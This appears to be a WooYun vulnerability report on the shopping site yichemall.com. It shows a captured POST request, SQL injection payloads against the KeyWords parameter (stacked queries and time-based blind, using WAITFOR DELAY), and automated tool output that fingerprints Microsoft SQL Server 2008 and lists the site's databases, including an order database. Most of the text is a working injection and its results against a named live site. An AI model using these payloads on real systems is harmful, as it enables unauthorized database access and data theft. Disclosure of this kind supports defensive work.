WooYun.org

POST /Service/index HTTP/1.1
Host: www.yichemall.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: xxxx, xxxxxxx
Referer: http://www.yichemall.com/Service/index
Cookie: 
**********************************打码区*************************************
*****************************************************************************
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
KeyWords=%E2%80%98

Place: POST
Parameter: KeyWords
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: KeyWords=%E2%80%98'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: KeyWords=%E2%80%98' WAITFOR DELAY '0:0:5'--
---
[07:56:23] [INFO] testing Microsoft SQL Server
[07:56:23] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
[07:56:28] [INFO] confirming Microsoft SQL Server
[07:56:44] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 4.0.30319, Nginx
back-end DBMS: Microsoft SQL Server 2008
[07:56:44] [INFO] fetching database names
[07:56:44] [INFO] fetching number of databases
[07:56:44] [INFO] retrieved: 3
[07:57:01] [INFO] retrieved: master
[07:59:05] [INFO] retrieved:
[07:59:33] [ERROR] invalid character detected. retrying..
[07:59:33] [WARNING] increasing time delay to 6 seconds
tempdb
[08:02:18] [INFO] retrieved: yichemallorder
available databases [3]:
[*] master
[*] tempdb
[*] yichemallorder